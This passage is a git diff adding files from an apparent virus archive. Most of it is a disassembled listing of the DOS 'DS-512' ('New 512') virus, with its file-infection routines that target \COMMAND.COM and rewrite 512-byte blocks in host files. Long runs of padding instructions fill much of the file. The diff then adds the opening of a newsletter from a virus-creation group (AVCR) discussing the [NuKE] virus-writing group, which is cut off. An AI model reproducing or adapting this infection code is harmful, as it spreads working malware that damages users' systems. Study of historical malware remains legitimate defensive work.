[BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +loc_2: ; N-Ref=2 + mov DI,offset var1_100 + mov SI,Word Ptr [DI+5] + add SI,DI + mov CX,7 + push DS + push DI + cld ; Clear direction flag + push CX + push SI + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + xchg CX,AX + pop DI + pop CX + repz stosb ; Repeat if ZF = 1, CX > 0 + ; Store AL at ES:DI + pop DI + push DI + mov CH,8Ch + mov ES,CX + +; + assume ES:nothing +; + + call near ptr proc_1 +proc_start endp + + + +; +; +; PROCEDURE proc_1 +; +; + +proc_1 proc far + pop SI + sub SI,+20h + nop ; 1 Fixup + mov CX,200h + mov DX,132h + push CX + push SI + push ES + push DX + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + retf ; Return FAR +proc_1 endp + + + + dw 595Fh, 71Eh, 1F0Eh, 0AAF3h + dw 13CDh, 8E06h, 0BFC1h, 4Ch + dw 0ACB8h, 2601h, 587h, 0A8A3h + dw 8C01h, 26C8h, 4587h, 0A302h + dw 1AAh, 19B8h, 2602h, 4587h + dw 0A338h, 215h, 0C88Ch, 8726h + dw 3A45h, 17A3h, 2602h, 5DC5h + dw 8175h, 903Fh, 7590h, 8B05h + dw 85Fh, 1FC5h, 25B9h, offset loc_2 + db 0D9h +loop_loc_3: ; N-Ref=2 + inc BX + cmp Word Ptr [BX],0FC80h + jne loc_4 ; Jump if not equal ( != ) + mov AX,BX +loc_4: ; N-Ref=1 + loop loop_loc_3 ; Loop if CX > 0 + mov DI,1C8h + stosw ; Store AX at ES:DI + mov AX,DS + stosw ; Store AX at ES:DI + mov AH,4Bh ; 'K' + mov DX,2F1h + push CS + pop DS + int 21h ; DOS func ( ah ) = 4Bh + ; EXEC: Load/execute program + ;AL-subfnc DS:DX-ASCIIZ string + ; ES:BX-ptr to cntl block + ;AX-ret code + pop DS + +; + assume DS:nothing +; + + push DS + pop ES + pop DI + push DI + cmp Word Ptr [DI],5A4Dh + jne loc_5 ; Jump if not equal ( != ) + mov AH,4Ch ; 'L' + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code +loc_5: ; N-Ref=1 + retf ; Return FAR + + dw 0EA9Dh, 5C0h, 0C9E3h, 2E9Ch + dw 3E80h, 0FFh, 7500h, 80F1h + dw 2FCh, 0EC75h, 0FF2Eh, 0A81Eh + dw 9C01h, 0F72h, 1E60h, 0B591h + dw 0E800h, 0Bh, 0C780h, 0E202h + dw 1FF8h, 9D61h, 2CAh, 6000h + dw 1F06h, 7F81h, 8B03h, 7575h + dw 800Eh, 0E93Fh, 0B74h, 0B9h + dw 0C602h, 7, 0E243h, 61FAh + db 0C3h +loc_6: ; N-Ref=0 + mov DI,BX + mov SI,Word Ptr [DI+5] + add SI,DI + mov CL,7 + cld ; Clear direction flag + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + mov CL,7 + dec SI + mov Byte Ptr [SI],CH + loop loc_notfound ; Loop if CX > 0 + + dw 0C361h, 0FDE9h, 8B01h, 3075h + db 0 +loc_7: ; N-Ref=1 + mov Byte Ptr DS:data_ff,0 + pop ES + pop DS + + dw 9D61h, 9EEAh, 2310h, 9C01h + dw 0FC80h, 754Bh, 60F4h, 61Eh + dw 2B8h, 0CD3Dh, 0E72h, 721Fh + dw 0FEE0h, 0FF06h, 9300h, 2B8h + dw 3342h, 33C9h, 0CDD2h, 0B72h + dw 75D2h, 0B82Bh, 4200h, 0C933h + dw 72CDh, 3FB4h, 4B5h, 0BAh + dw 8B03h, 0CDF2h, 3B72h, 75C1h + dw 8115h, 37Ch, 758Bh, 0E74h + db 0FCh, 83h, 0C6h, 7, 0B9h, 0F3h + db 1 +loop_loc_8: ; N-Ref=2 + lodsb ; Load byte at DS:SI to AL + or AL,AL + je loc_9 ; Jump if equal ( = ) + loop loop_loc_8 ; Loop if CX > 0 + jmp short loc_12 +loc_9: ; N-Ref=1 + + dw 0B960h, 6, 0AACh, 75C0h + dw 0E20Dh, 61F9h, 0EE81h, 301h + dw 3689h, 209h, 3EBh, 0EB61h + dw 0BAE3h, 200h +loc_10: ; N-Ref=2 + mov SI,500h + mov CX,200h +loop_loc_11: ; N-Ref=1 + cmp Byte Ptr [SI],DL + jne loc_13 ; Jump if not equal ( != ) + inc SI + loop loop_loc_11 ; Loop if CX > 0 + mov AX,4200h + int 72h + sub AX,3 + mov Word Ptr DS:data_205,AX + mov AH,40h ; '@' + mov CX,200h + inc DH + int 72h + cmp AX,CX + jne loc_14 ; Jump if not equal ( != ) + mov AX,4200h + xor CX,CX + mov DX,Word Ptr DS:data_209 + int 72h + mov AH,40h ; '@' + mov CL,7 + mov DX,offset loc_2 + int 72h + cmp AX,CX + jne loc_14 ; Jump if not equal ( != ) + mov AX,4200h + xor CX,CX + xor DX,DX + int 72h + mov AH,40h ; '@' + mov CL,7 + mov DX,204h + int 72h +loc_12: ; N-Ref=1 + jmp short loc_14 +loc_13: ; N-Ref=1 + add DH,2 + push DX + mov AH,3Fh ; '?' + mov CX,200h + mov DX,500h + int 72h + cmp AX,CX + pop DX + je loc_10 ; Jump if equal ( = ) +loc_14: ; N-Ref=3 + mov AH,3Eh ; '>' + int 72h + jmp loc_7 + +var1_4f1 db '\COMMAND.COM' + db 0 +var1_4fe db 44h, 53h +CODE_SEG_1 ends + + + + end start +----------------------------------------------------------------------------- +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + Disassembly of the DS-512 Virus AFTER It Was Executed +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +----------------------------------------------------------------------------- + + PAGE 60,132 + + + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + mov AH,9 + mov DX,offset var1_10c + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov AX,4C00h + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code +proc_start endp + + + +var1_10c db 'This is New 512 Virus .........!!!' + db 7, 24h + db 18 dup (0) +loc_1: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +CODE_SEG_1 ends + + + + end start + diff --git a/textfiles.com/virus/avcr-01.003 b/textfiles.com/virus/avcr-01.003 new file mode 100644 index 00000000..dc5a7c62 --- /dev/null +++ b/textfiles.com/virus/avcr-01.003 @@ -0,0 +1,55 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + +> Nuking [NuKE] +> [NuKE] is one of the biggest virus research \ virus creation groups +>out there, as they have their own [NuKE] Net, over 100 megs of viruses, and +>an abundance of members. But can a virus group become TOO big? In truth, the +>answer depends on the answerer, but since I am writing this article I will +>state my point of view. +> Personally, I think that [NuKE] has lost its "magic touch," for it has +>become SO big and SO many people belong to [NuKE] that many less experienced +>members write viruses putting the [NuKE] signature on it, that are hardly 